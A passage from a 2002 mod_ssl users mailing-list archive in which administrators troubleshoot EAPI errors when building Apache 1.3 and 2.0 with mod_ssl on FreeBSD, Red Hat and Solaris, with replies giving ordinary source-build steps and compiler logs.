charm. END ------------------------------------------------------------------------------ Philip M. Gollucci (p6m7g8) philip@p6m7g8.com 301.314.3118 301.646.3011 Science, Discovery, & the Universe (UMCP) Webmaster & Webship Teacher URL: http://www.sdu.umd.edu EJournalPress.com Database/PERL Programmer & System Admin URL : http://www.ejournalpress.com Homepage : http://p6m7g8.com Resume : http://p6m7g8.com/Work/index.html Software : http://p6m7g8.com/Developement/ On Thu, 11 Apr 2002, Server Admin wrote: > Hello: Running FBSD 4.5, I've been struggling with my first Apache+modssl > install from ports and get the need to recompile with -DEAPI error as well > when I run configtest. I'm unfamiliar as to what to do about that except > most likely some modifications need to be made to the Makefile in each > port... This are the latest ports with apache+mod_ssl-1.3.24+2.8.8. > > It doesn't like the mod_ssl2.8.8 port that is supposed to be alright for > the SSL install...., so wondered why it didn't make install right.... and > what would be the modifications?... sorry to impose on your time, but > tearing out my hair and not much left before going bald! > > Here's the error, if you have a moment to look and advise. Need a secure > server setup badly.... thanks in advance! > > INSTALL ERROR > ====================================================================== > [Wed Apr 10 18:26:46 2002] [warn] Loaded DSO libexec/apache/libphp4.so uses > plain Apache 1.3 API, this module might crash under EAPI! (please recompile > it with -DEAPI) > [Wed Apr 10 18:26:46 2002] [warn] Loaded DSO > libexec/apache/mod_frontpage.so uses plain Apache 1.3 API, this module > might crash under EAPI! (please recompile it with -DEAPI) > ====================================================================== > > At 03:01 AM 4.11.2002 -0500, Philip M. Gollucci wrote: > >if you install apache from ports then just go to the mod_perl port and > >install that too. It will work fine. > > > > > >END > >--------------------------------------------------------------------------- > --- > >Philip M. Gollucci (p6m7g8) philip@p6m7g8.com 301.314.3118 301.646.3011 > > > >Science, Discovery, & the Universe (UMCP) > > Webmaster & Webship Teacher > > URL: http://www.sdu.umd.edu > > > >EJournalPress.com > > Database/PERL Programmer & System Admin > > URL : http://www.ejournalpress.com > > > >Homepage : http://p6m7g8.com > >Resume : http://p6m7g8.com/Work/index.html > >Software : http://p6m7g8.com/Developement/ > > > > > > > >On Thu, 11 Apr 2002, Mike Loiterman wrote: > > > >> > >> -----BEGIN PGP SIGNED MESSAGE----- > >> Hash: SHA1 > >> > >> I currently have apache installed via its port, but I need to use > >> mod_perl. It is my understanding that apache needs to be recompiled > >> in order for this to work. How should I go about doing this? Should > >> I just cd in /usr/ports/mod_perl and do a make && make install? Will > >> this recompile and reinstall apache? > >> > >> Mike Loiterman > >> mike@ascendency.net > >> PGP Key 0xD1B9D18E > >> > >> > >> -----BEGIN PGP SIGNATURE----- > >> Version: PGP 7.0.4 > >> Comment: Message digitally signed by Mike Loiterman > >> > >> iQA/AwUBPLV80WjZbUnRudGOEQJFFACgup8vH4RnPy7tsbTAQcskaXLYmGoAnjUS > >> 50eHNtMkvIv7+20+DY+xA4lu > >> =SaGN > >> -----END PGP SIGNATURE----- > >> > >> > >> To Unsubscribe: send mail to majordomo@FreeBSD.org > >> with "unsubscribe freebsd-questions" in the body of the message > >> > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-questions" in the body of the message > > > > > > .... our website: http://www.sage-one.net/ > > Best regards, > > Jack L. Stone > Server Admin > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 12 11:26:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA06805; Fri, 12 Apr 2002 11:25:14 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ukth006-2ksex-t.eckoh.com id LAA06767; Fri, 12 Apr 2002 11:24:20 +0200 (MET DST) Received: from th365122 ([10.0.11.68]) by ukth006-2ksex-t.eckoh.com with Microsoft SMTPSVC(5.0.2195.4905); Fri, 12 Apr 2002 10:22:51 +0100 Message-ID: <050101c1e203$9e8e4df0$440b000a@eckoh.com> From: "Mohamed Alwakeel" To: Subject: Problem with Compiling Mod_ssl Date: Fri, 12 Apr 2002 10:22:51 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-OriginalArrivalTime: 12 Apr 2002 09:22:51.0544 (UTC) FILETIME=[9E85E980:01C1E203] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Mohamed Alwakeel" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I keep on getting an error when I do a ./configure --with-apxs=/usr/local/apachenew/bin/apxs --with-apache=/root/moh/apache_1.3.22 Error:- Configuring mod_ssl/2.7.1 for Apache/1.3.14 /configure:Error: Installed Apache doesn't contain Extended API (EAPI) I am getting very similar error when compiling mod_ssl for apache 1.3.22, with either version mod ssl-2.7.1 or version mod ssl-2.8.8. I have a redhat 7.2 box patched up to latest packages. It does have apache 1.3.22 installed as an rpm and apache 1.3.22 installed from source under /usr/local/apachenew. Im not using the rpm one Im using the source installed one. I have the whole source directory for apache under /root/moh/apache_1.3.22 When I do httpd -l I get the following:- /httpd -l Compiled-in modules: http_core.c mod_mmap_static.c mod_vhost_alias.c mod_env.c mod_log_config.c mod_log_agent.c mod_log_referer.c mod_mime_magic.c mod_mime.c mod_negotiation.c mod_status.c mod_info.c mod_include.c mod_autoindex.c mod_dir.c mod_cgi.c mod_asis.c mod_imap.c mod_actions.c mod_speling.c mod_userdir.c mod_alias.c mod_rewrite.c mod_access.c mod_auth.c mod_auth_anon.c mod_auth_dbm.c mod_auth_db.c mod_digest.c mod_auth_digest.c mod_proxy.c mod_cern_meta.c mod_expires.c mod_headers.c mod_usertrack.c mod_example.c mod_unique_id.c mod_so.c mod_setenvif.c suexec: disabled; invalid wrapper /usr/local/apachenew/bin/suexec Is there any way to fix this without having to recompile apache again ? Thanks ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 12 11:43:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA07548; Fri, 12 Apr 2002 11:42:09 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id LAA07524; Fri, 12 Apr 2002 11:41:12 +0200 (MET DST) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id LAA21272 for ; Fri, 12 Apr 2002 11:41:06 +0200 (MET DST) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma021270; Fri, 12 Apr 02 11:41:06 +0200 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id LAA12683 for ; Fri, 12 Apr 2002 11:41:05 +0200 (MET DST) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id LAA26855 for ; Fri, 12 Apr 2002 11:41:04 +0200 (MEST) Message-ID: <3CB6ABB0.49812BC1@bourse.ch> Date: Fri, 12 Apr 2002 11:41:04 +0200 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Problem with Compiling Mod_ssl References: <050101c1e203$9e8e4df0$440b000a@eckoh.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Mohamed Alwakeel wrote: > > I keep on getting an error when I do a > ./configure --with-apxs=/usr/local/apachenew/bin/apxs > --with-apache=/root/moh/apache_1.3.22 > > Error:- > Configuring mod_ssl/2.7.1 for Apache/1.3.14 > /configure:Error: Installed Apache doesn't contain Extended API (EAPI) > > I am getting very similar error when compiling mod_ssl for apache 1.3.22, > with either version mod ssl-2.7.1 > or version mod ssl-2.8.8. > > I have a redhat 7.2 box patched up to latest packages. It does have apache > 1.3.22 installed as an rpm and apache 1.3.22 installed from source under > /usr/local/apachenew. Im not using the rpm one Im using the source installed > one. > I have the whole source directory for apache under /root/moh/apache_1.3.22 > > When I do httpd -l I get the following:- > /httpd -l > Compiled-in modules: > http_core.c > mod_mmap_static.c > mod_vhost_alias.c > mod_env.c > mod_log_config.c > mod_log_agent.c > mod_log_referer.c > mod_mime_magic.c > mod_mime.c > mod_negotiation.c > mod_status.c > mod_info.c > mod_include.c > mod_autoindex.c > mod_dir.c > mod_cgi.c > mod_asis.c > mod_imap.c > mod_actions.c > mod_speling.c > mod_userdir.c > mod_alias.c > mod_rewrite.c > mod_access.c > mod_auth.c > mod_auth_anon.c > mod_auth_dbm.c > mod_auth_db.c > mod_digest.c > mod_auth_digest.c > mod_proxy.c > mod_cern_meta.c > mod_expires.c > mod_headers.c > mod_usertrack.c > mod_example.c > mod_unique_id.c > mod_so.c > mod_setenvif.c > suexec: disabled; invalid wrapper /usr/local/apachenew/bin/suexec > > Is there any way to fix this without having to recompile apache again ? No. apache *needs* the extended API (EAPI) to connect to the openssl library functions. In order to use mod_ssl, you need to recompile apache with EAPI.. This is true whether you compile in mod_ssl statically or load it as a DSO. However, it shouldn't be too much trouble - the INSTALL document in the mod_ssl distro is quite good. Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 12 11:56:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA08029; Fri, 12 Apr 2002 11:55:19 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from eprotea.com.my id LAA07979; Fri, 12 Apr 2002 11:54:22 +0200 (MET DST) Received: from there (zan [192.168.2.127]) by eprotea.com.my (8.9.3/8.9.3) with SMTP id RAA29898 for ; Fri, 12 Apr 2002 17:54:09 +0800 Message-Id: <200204120954.RAA29898@eprotea.com.my> Content-Type: text/plain; charset="iso-8859-15" From: "M.Hanizan" To: modssl-users@modssl.org Subject: Re: how to get back the original certificate from SSL structure ? Date: Wed, 12 Jun 2002 12:02:30 +0800 X-Mailer: KMail [version 1.3.1] References: <200204101153.TAA28172@eprotea.com.my> <005001c1e107$e6540050$0a01a8c0@demo> In-Reply-To: <005001c1e107$e6540050$0a01a8c0@demo> MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "M.Hanizan" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Thanks... it really work :) Inside ~ssl_engine_kernel.c~ in function ~void ssl_hook_NewConnection(conn_rec *conn)~, I added a line of : rawcert = ssl_var_lookup(conn->pool, conn->base_server, conn, NULL, "SSL_CLIENT_CERT"); where rawcert is char * and conn is conn_rec *. Plus a small configuration inside httpd.conf as you suggested to me; SSLOptions +ExportCertData, the result is what I want. This function will return the string as inside the certificate file. Regards :) M.Hanizan ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 12 14:20:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA15903; Fri, 12 Apr 2002 14:19:20 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from sage-one.net id OAA15857; Fri, 12 Apr 2002 14:18:21 +0200 (MET DST) Received: from SAGEONE (sageone [192.168.0.5]) by sage-one.net (8.11.6/8.11.6) with SMTP id g3CCIKK36084; Fri, 12 Apr 2002 07:18:20 -0500 (CDT) (envelope-from admin@sage-one.net) Message-Id: <3.0.5.32.20020412071828.02dffcd0@mail.sage-one.net> X-Sender: admin@mail.sage-one.net X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Fri, 12 Apr 2002 07:18:28 -0500 To: modssl-users@modssl.org, modssl-users@modssl.org From: Server Admin Subject: Re: Problem with Compiling Mod_ssl In-Reply-To: <3CB6ABB0.49812BC1@bourse.ch> References: <050101c1e203$9e8e4df0$440b000a@eckoh.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Server Admin X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users At 11:41 AM 4.12.2002 +0200, Owen Boyle wrote: >Mohamed Alwakeel wrote: >> >> I keep on getting an error when I do a >> ./configure --with-apxs=/usr/local/apachenew/bin/apxs >> --with-apache=/root/moh/apache_1.3.22 >> >> Error:- >> Configuring mod_ssl/2.7.1 for Apache/1.3.14 >> /configure:Error: Installed Apache doesn't contain Extended API (EAPI) >> >> I am getting very similar error when compiling mod_ssl for apache 1.3.22, >> with either version mod ssl-2.7.1 >> or version mod ssl-2.8.8. >> >> I have a redhat 7.2 box patched up to latest packages. It does have apache >> 1.3.22 installed as an rpm and apache 1.3.22 installed from source under >> /usr/local/apachenew. Im not using the rpm one Im using the source installed >> one. >> I have the whole source directory for apache under /root/moh/apache_1.3.22 >> >> When I do httpd -l I get the following:- >> /httpd -l >> Compiled-in modules: >> http_core.c >> mod_mmap_static.c >> mod_vhost_alias.c >> mod_env.c >> mod_log_config.c >> mod_log_agent.c >> mod_log_referer.c >> mod_mime_magic.c >> mod_mime.c >> mod_negotiation.c >> mod_status.c >> mod_info.c >> mod_include.c >> mod_autoindex.c >> mod_dir.c >> mod_cgi.c >> mod_asis.c >> mod_imap.c >> mod_actions.c >> mod_speling.c >> mod_userdir.c >> mod_alias.c >> mod_rewrite.c >> mod_access.c >> mod_auth.c >> mod_auth_anon.c >> mod_auth_dbm.c >> mod_auth_db.c >> mod_digest.c >> mod_auth_digest.c >> mod_proxy.c >> mod_cern_meta.c >> mod_expires.c >> mod_headers.c >> mod_usertrack.c >> mod_example.c >> mod_unique_id.c >> mod_so.c >> mod_setenvif.c >> suexec: disabled; invalid wrapper /usr/local/apachenew/bin/suexec >> >> Is there any way to fix this without having to recompile apache again ? > >No. apache *needs* the extended API (EAPI) to connect to the openssl >library functions. In order to use mod_ssl, you need to recompile apache >with EAPI.. This is true whether you compile in mod_ssl statically or >load it as a DSO. > >However, it shouldn't be too much trouble - the INSTALL document in the >mod_ssl distro is quite good. > >Rgds, > >Owen Boyle. >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > Owen: I run FBSD 4.5-stable and have tried 5-6 times to install apache+mod_ssl-1.3.24+2.8.8 directly from ports that does all the work, where I simply use "make install clean" but I'm getting the same (or similar) error message, but don't have a clue as to how to do the "re-compile". Could you please point me to the "...the INSTALL document in the mod_ssl distro is quite good..." that you refer to. I'm desparate to set up a secure server as time is of the essence. Does "mod_ssl" install that document in the /usr/local/share/ directory during the install. To be more specific, here is the error I get: ============================================== [Wed Apr 10 18:26:46 2002] [warn] Loaded DSO libexec/apache/libphp4.so uses plain Apache 1.3 API, this module might crash under EAPI! (please recompile it with -DEAPI) [Wed Apr 10 18:26:46 2002] [warn] Loaded DSO libexec/apache/mod_frontpage.so uses plain Apache 1.3 API, this module might crash under EAPI! (please recompile it with -DEAPI) ============================================== I've received an earlier reply to do what I've been doing, so I'm getting nowhere fast.... .... our website: http://www.sage-one.net/ Best regards, Jack L. Stone Server Admin ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 12 14:47:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA17233; Fri, 12 Apr 2002 14:46:13 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id OAA17229; Fri, 12 Apr 2002 14:46:03 +0200 (MET DST) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id OAA24809 for ; Fri, 12 Apr 2002 14:45:57 +0200 (MET DST) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma024807; Fri, 12 Apr 02 14:45:53 +0200 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id OAA09085 for ; Fri, 12 Apr 2002 14:45:52 +0200 (MET DST) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id OAA12047 for ; Fri, 12 Apr 2002 14:45:51 +0200 (MEST) Message-ID: <3CB6D6FF.4AA6B485@bourse.ch> Date: Fri, 12 Apr 2002 14:45:51 +0200 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Problem with Compiling Mod_ssl References: <050101c1e203$9e8e4df0$440b000a@eckoh.com> <3.0.5.32.20020412071828.02dffcd0@mail.sage-one.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Server Admin wrote: > > Owen: I run FBSD 4.5-stable and have tried 5-6 times to install > apache+mod_ssl-1.3.24+2.8.8 directly from ports that does all the work, > where I simply use "make install clean" but I'm getting the same (or > similar) error message, but don't have a clue as to how to do the > "re-compile". Could you please point me to the > "...the INSTALL document in the mod_ssl distro is quite good..." > that you refer to. I'm desparate to set up a secure server as time is of > the essence. Does "mod_ssl" install that document in the /usr/local/share/ > directory during the install. > > To be more specific, here is the error I get: > ============================================== > [Wed Apr 10 18:26:46 2002] [warn] Loaded DSO libexec/apache/libphp4.so uses > plain Apache 1.3 API, this module might crash under EAPI! (please recompile > it with -DEAPI) > [Wed Apr 10 18:26:46 2002] [warn] Loaded DSO > libexec/apache/mod_frontpage.so uses plain Apache 1.3 API, this module > might crash under EAPI! (please recompile it with -DEAPI) > ============================================== When you untar the mod_ssl distro it's right there in the top directory. Here are my notes from the last time I installed plain statically compiled apache+mod_ssl (this is version 1.3.14 - just change the numbers and the installation paths to suit your distro): Installing Apache 1.3.14 with mod_ssl and mm ----------------------------------------------- (see http://www.modssl.org/example/) - Get the sources: - www.apache.org <-- apache_1.3.14.tar.gz - ftp://ftp.openssl.org <-- openssl-0.9.6.tar.gz - www.modssl.org <-- mod_ssl-2.7.1-1.3.14.tar.gz - www.engelschall.com/sw/mm/ <-- mm-1.1.3.tar.gz - Save all these in /home/obo/downloads/tar_files # cd /home/apache # gzip -d -c /home/obo/downloads/tar_files/apache_1.3.14.tar.gz | tar xvf - # gzip -d -c /home/obo/downloads/tar_files/openssl-0.9.6.tar.gz | tar xvf - # gzip -d -c /home/obo/downloads/tar_files/mod_ssl-2.7.1-1.3.14.tar.gz | tar xvf - # gzip -d -c /home/obo/downloads/tar_files/mm-1.1.3.tar.gz | tar xvf - - Need to add perl and ar to the path; # PERL=/usr/local/bin/perl # export PERL # PATH=$PATH:/usr/local/bin:/usr/ccs/bin # export PATH - first, compile MM # cd mm-1.1.3 # ./configure --prefix=/home/apache/mm # make # make test # make install - All the files are untarred, so we go to openssl-0.9.6 # cd ../openssl-0.9.6 # ./Configure solaris-sparcv9-gcc --prefix=/home/apache # make clean # make - Switch to the modd_ssl directory and configure it. # cd ../mod_ssl-2.7.1-1.3.14 # ./configure --with-apache=../apache_1.3.14 --with-ssl=../openssl-0.9.6 --prefix=/home/apache - Switch to the apache directory # cd ../apache_1.3.14 # SSL_BASE=../openssl-0.9.6 # export SSL_BASE # ./configure --enable-module=ssl --prefix=/home/apache # make # make install ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 12 16:56:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA24361; Fri, 12 Apr 2002 16:55:11 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id QAA24326; Fri, 12 Apr 2002 16:54:24 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id A89AC4CE731; Fri, 12 Apr 2002 16:54:23 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g3CEiPY02168; Fri, 12 Apr 2002 16:44:25 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id PAA19564; Fri, 12 Apr 2002 15:30:43 +0200 (MET DST) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id PAA26062; Fri, 12 Apr 2002 15:30:37 +0200 (MET DST) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma026060; Fri, 12 Apr 02 15:30:33 +0200 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id PAA15571; Fri, 12 Apr 2002 15:30:32 +0200 (MET DST) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id PAA15788; Fri, 12 Apr 2002 15:30:32 +0200 (MEST) Message-ID: <3CB6E178.9A2FD9E4@bourse.ch> Date: Fri, 12 Apr 2002 15:30:32 +0200 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: pmiles@peragis.com, mod_ssl Subject: How To Unsubscribe. References: <000601c1e223$a929b4a0$2b05a8c0@hd042> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users pmiles@peragis.com wrote: > > i have asked to be removed from the mailing list so remove me please First: Don't send mails directly - always go through the list. Second: I am just a user like you - I couldn't unsubscribe you if I wanted to. Third: Do it yourself, it's the only way - http://www.modssl.org/support/ Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 12 19:40:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA03435; Fri, 12 Apr 2002 19:39:15 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from europa.bton.ac.uk id TAA03414; Fri, 12 Apr 2002 19:38:38 +0200 (MET DST) Received: from sirius.admin.bton.ac.uk ([194.83.112.5] helo=bton.ac.uk) by europa.bton.ac.uk with esmtp (Exim 3.35 #1) id 16w50R-0000ib-00; Fri, 12 Apr 2002 18:38:39 +0100 Message-ID: <3CB71B9D.78E7C0F7@bton.ac.uk> Date: Fri, 12 Apr 2002 18:38:37 +0100 From: Ray Hillman Organization: University of Brighton X-Mailer: Mozilla 4.7 [en] (X11; I; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Problems building Apache 2.0.35 with mod_ssl enabled Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Ray Hillman X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, Having built OpenSSL 0.9.7, I have attempted a build of Apache 2.0.35 twice now with mod_ssl enabled and have hit the following error, where conflicting types are declared in mod_ssl.h and ssl_engine_kernel.c: . . . Making all in ssl /bin/sh /export/home/rkh/httpd-2.0.35/srclib/apr/libtool --silent --mode=compile gcc -g -O2 -pthreads -DNO_DBM_REWRITEMAP -DSOLARIS2=8 -D_POSIX_PTHREAD_SEMANTICS -D_REENTRANT -DAP_HAVE_DESIGNATED_INITIALIZER -I. -I/export/home/rkh/httpd-2.0.35/os/unix -I/export/home/rkh/httpd-2.0.35/server/mpm/prefork -I/export/home/rkh/httpd-2.0.35/modules/http -I/export/home/rkh/httpd-2.0.35/modules/proxy -I/export/home/rkh/httpd-2.0.35/include -I/export/home/rkh/httpd-2.0.35/srclib/apr/include -I/export/home/rkh/httpd-2.0.35/srclib/apr-util/include -I/local/ssl/include/openssl -I/local/ssl/include -I/export/home/rkh/httpd-2.0.35/modules/dav/main -I/export/home/rkh/httpd-2.0.35/srclib/apr-util/include -I/export/home/rkh/httpd-2.0.35/srclib/apr-util/xml/expat/lib -c mod_ssl.c && touch mod_ssl.lo /bin/sh /export/home/rkh/httpd-2.0.35/srclib/apr/libtool --silent --mode=compile gcc -g -O2 -pthreads -DNO_DBM_REWRITEMAP -DSOLARIS2=8 -D_POSIX_PTHREAD_SEMANTICS -D_REENTRANT -DAP_HAVE_DESIGNATED_INITIALIZER -I. -I/export/home/rkh/httpd-2.0.35/os/unix -I/export/home/rkh/httpd-2.0.35/server/mpm/prefork -I/export/home/rkh/httpd-2.0.35/modules/http -I/export/home/rkh/httpd-2.0.35/modules/proxy -I/export/home/rkh/httpd-2.0.35/include -I/export/home/rkh/httpd-2.0.35/srclib/apr/include -I/export/home/rkh/httpd-2.0.35/srclib/apr-util/include -I/local/ssl/include/openssl -I/local/ssl/include -I/export/home/rkh/httpd-2.0.35/modules/dav/main -I/export/home/rkh/httpd-2.0.35/srclib/apr-util/include -I/export/home/rkh/httpd-2.0.35/srclib/apr-util/xml/expat/lib -c ssl_engine_config.c && touch ssl_engine_config.lo /bin/sh /export/home/rkh/httpd-2.0.35/srclib/apr/libtool --silent --mode=compile gcc -g -O2 -pthreads -DNO_DBM_REWRITEMAP -DSOLARIS2=8 -D_POSIX_PTHREAD_SEMANTICS -D_REENTRANT -DAP_HAVE_DESIGNATED_INITIALIZER -I. -I/export/home/rkh/httpd-2.0.35/os/unix -I/export/home/rkh/httpd-2.0.35/server/mpm/prefork -I/export/home/rkh/httpd-2.0.35/modules/http -I/export/home/rkh/httpd-2.0.35/modules/proxy -I/export/home/rkh/httpd-2.0.35/include -I/export/home/rkh/httpd-2.0.35/srclib/apr/include -I/export/home/rkh/httpd-2.0.35/srclib/apr-util/include -I/local/ssl/include/openssl -I/local/ssl/include -I/export/home/rkh/httpd-2.0.35/modules/dav/main -I/export/home/rkh/httpd-2.0.35/srclib/apr-util/include -I/export/home/rkh/httpd-2.0.35/srclib/apr-util/xml/expat/lib -c ssl_engine_dh.c && touch ssl_engine_dh.lo /bin/sh /export/home/rkh/httpd-2.0.35/srclib/apr/libtool --silent --mode=compile gcc -g -O2 -pthreads -DNO_DBM_REWRITEMAP -DSOLARIS2=8 -D_POSIX_PTHREAD_SEMANTICS -D_REENTRANT -DAP_HAVE_DESIGNATED_INITIALIZER -I. -I/export/home/rkh/httpd-2.0.35/os/unix -I/export/home/rkh/httpd-2.0.35/server/mpm/prefork -I/export/home/rkh/httpd-2.0.35/modules/http -I/export/home/rkh/httpd-2.0.35/modules/proxy -I/export/home/rkh/httpd-2.0.35/include -I/export/home/rkh/httpd-2.0.35/srclib/apr/include -I/export/home/rkh/httpd-2.0.35/srclib/apr-util/include -I/local/ssl/include/openssl -I/local/ssl/include -I/export/home/rkh/httpd-2.0.35/modules/dav/main -I/export/home/rkh/httpd-2.0.35/srclib/apr-util/include -I/export/home/rkh/httpd-2.0.35/srclib/apr-util/xml/expat/lib -c ssl_engine_init.c && touch ssl_engine_init.lo /bin/sh /export/home/rkh/httpd-2.0.35/srclib/apr/libtool --silent --mode=compile gcc -g -O2 -pthreads -DNO_DBM_REWRITEMAP -DSOLARIS2=8 -D_POSIX_PTHREAD_SEMANTICS -D_REENTRANT -DAP_HAVE_DESIGNATED_INITIALIZER -I. -I/export/home/rkh/httpd-2.0.35/os/unix -I/export/home/rkh/httpd-2.0.35/server/mpm/prefork -I/export/home/rkh/httpd-2.0.35/modules/http -I/export/home/rkh/httpd-2.0.35/modules/proxy -I/export/home/rkh/httpd-2.0.35/include -I/export/home/rkh/httpd-2.0.35/srclib/apr/include -I/export/home/rkh/httpd-2.0.35/srclib/apr-util/include -I/local/ssl/include/openssl -I/local/ssl/include -I/export/home/rkh/httpd-2.0.35/modules/dav/main -I/export/home/rkh/httpd-2.0.35/srclib/apr-util/include -I/export/home/rkh/httpd-2.0.35/srclib/apr-util/xml/expat/lib -c ssl_engine_io.c && touch ssl_engine_io.lo /bin/sh /export/home/rkh/httpd-2.0.35/srclib/apr/libtool --silent --mode=compile gcc -g -O2 -pthreads -DNO_DBM_REWRITEMAP -DSOLARIS2=8 -D_POSIX_PTHREAD_SEMANTICS -D_REENTRANT -DAP_HAVE_DESIGNATED_INITIALIZER -I. -I/export/home/rkh/httpd-2.0.35/os/unix -I/export/home/rkh/httpd-2.0.35/server/mpm/prefork -I/export/home/rkh/httpd-2.0.35/modules/http 